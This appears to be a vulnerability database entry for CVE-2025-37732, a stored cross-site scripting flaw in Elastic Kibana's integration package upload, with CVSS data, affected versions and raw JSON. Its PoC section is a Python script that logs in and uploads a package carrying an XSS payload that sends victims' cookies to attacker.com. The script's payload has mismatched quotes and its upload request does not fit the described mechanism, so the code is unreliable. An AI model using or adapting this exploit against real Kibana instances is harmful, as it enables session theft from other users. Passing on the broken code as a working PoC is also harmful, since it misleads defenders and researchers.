Security Vulnerability Report
CVE-2025-37732 CVSS 5.4 MEDIUM

Published: 2025-12-15 11:15:40
Last Modified: 2025-12-18 01:45:37

Description

Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an authenticated user to render HTML tags within a user’s browser via the integration package upload functionality. This issue is related to ESA-2025-17 (CVE-2025-25018) bypassing that fix to achieve HTML injection.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

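cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions 7.0.0 through 7.17.29, inclusive) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions 8.0.0 up to, but not including, 8.19.8) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions 9.0.0 up to, but not including, 9.1.8) - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* (versions 9.2.0 up to, but not including, 9.2.2) - VULNERABLE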
Elastic Kibana < 8.19.8
Elastic Kibana < 9.1.8
Elastic Kibana < 9.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-37732 PoC - Kibana XSS via Integration Package Upload
# Target: Elastic Kibana < 8.19.8, < 9.1.8, < 9.2.2

TARGET_URL = "http://target-kibana:5601"
USERNAME = "attacker_user"
PASSWORD = "password"


def get_auth_token():
    """Authenticate and get session token"""
    login_url = f"{TARGET_URL}/api/security/v1/login"
    data = {"username": USERNAME, "password": PASSWORD}
    response = requests.post(login_url, json=data)
    return response.cookies


def upload_malicious_package(cookies):
    """Upload integration package with XSS payload"""
    upload_url = f"{TARGET_URL}/api/fleet/epm/packages"

    # XSS payload in package name/description
    payload = '<img src=x onerror="fetch(`https://attacker.com/steal?c="+document.cookie)">'

    package_data = {
        "name": f"malicious-package-{payload}",
        "version": "1.0.0",
        "description": f"Package with {payload} injected"
    }

    headers = {"kbn-xsrf": "true"}
    response = requests.post(
        upload_url,
        json=package_data,
        cookies=cookies,
        headers=headers
    )
    return response.status_code == 200


def main():
    print("[*] CVE-2025-37732 PoC - Kibana Integration Package XSS")
    cookies = get_auth_token()
    if upload_malicious_package(cookies):
        print("[+] Malicious package uploaded successfully")
        print("[*] XSS will trigger when users view integration details")
    else:
        print("[-] Failed to upload package")


if __name__ == "__main__":
    main()

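References

https://discuss.elastic.co/t/kibana-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-28/384064 (Vendor Advisory)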

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37732", "sourceIdentifier": "[email protected]", "published": "2025-12-15T11:15:39.860", "lastModified": "2025-12-18T01:45:36.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an authenticated user to render HTML tags within a user’s browser via the integration package upload functionality. This issue is related to ESA-2025-17 (CVE-2025-25018) bypassing that fix to achieve HTML injection."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.17.29", "matchCriteriaId": "8820B4BC-0DAB-4C9B-8053-90DE2C19646E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.8", "matchCriteriaId": "BB564579-5F98-4F52-B32A-9B87C25DF71B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.8", "matchCriteriaId": "4CFE640F-1CCC-4580-AC29-5438EE33627C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", 
"versionEndExcluding": "9.2.2", "matchCriteriaId": "C4429C9D-7DA5-4F27-B0AB-92F8D6F077CE"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-28/384064", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}